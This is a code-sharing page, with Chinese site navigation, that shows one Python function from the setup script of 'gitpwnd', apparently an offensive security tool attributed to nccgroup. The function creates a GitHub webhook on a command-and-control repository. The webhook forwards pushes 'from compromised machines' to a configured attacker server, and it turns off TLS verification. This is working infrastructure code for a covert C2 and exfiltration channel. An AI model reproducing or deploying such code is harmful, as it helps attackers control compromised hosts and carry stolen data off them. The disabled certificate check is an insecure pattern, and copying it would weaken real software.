setup.py 文件源码

python
阅读 22 收藏 0 点赞 0 评论 0

项目:gitpwnd 作者: nccgroup 项目源码 文件源码
def create_c2_webhook(config):
    print("[*] Creating GitHub webhook for C2 repo that will receive pushes from compromised machines ")

    g = Github(config["main_github_token"])
    g_user = g.get_user()
    repo = g_user.get_repo(config["github_c2_repo_name"])

    # this endpoint is defined in server/gitpwnd/controllers.py
    webhook_endpoint = config["attacker_server"] + "/api/repo/receive_branch"

    # We're using a self-signed cert, so we need to turn off TLS verification for now :(
    # See the following for details: https://developer.github.com/v3/repos/hooks/#create-a-hook
    hook_secret = str(uuid.uuid4())
    params = {"url": webhook_endpoint, "content_type": "json", "secret": hook_secret, "insecure_ssl": "1"}

    #  PyGithub's create_hook doc:
    # http://pygithub.readthedocs.io/en/latest/github_objects/Repository.html?highlight=create_hook
    try:
        repo.create_hook("web", params, ["push"], True)
    except:
        print("[!] Web hook already exists")
        hook = repo.get_hooks()[0]
        if "secret" not in hook.config.keys():
            print("[!] Adding a secret to the hook...")
        else:
            hook_secret = input("Enter webhook secret (Github Repo > Settings > Webhooks > Edit > Inspect 'Secret' element): ")
        new_hook_config = hook.config
        new_hook_config["secret"] = hook_secret
        hook.edit(name=hook.name, config=new_hook_config)
    finally:
        return hook_secret


# Automatically generate a new password for the gitpwnd server
# so we don't use a default one
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号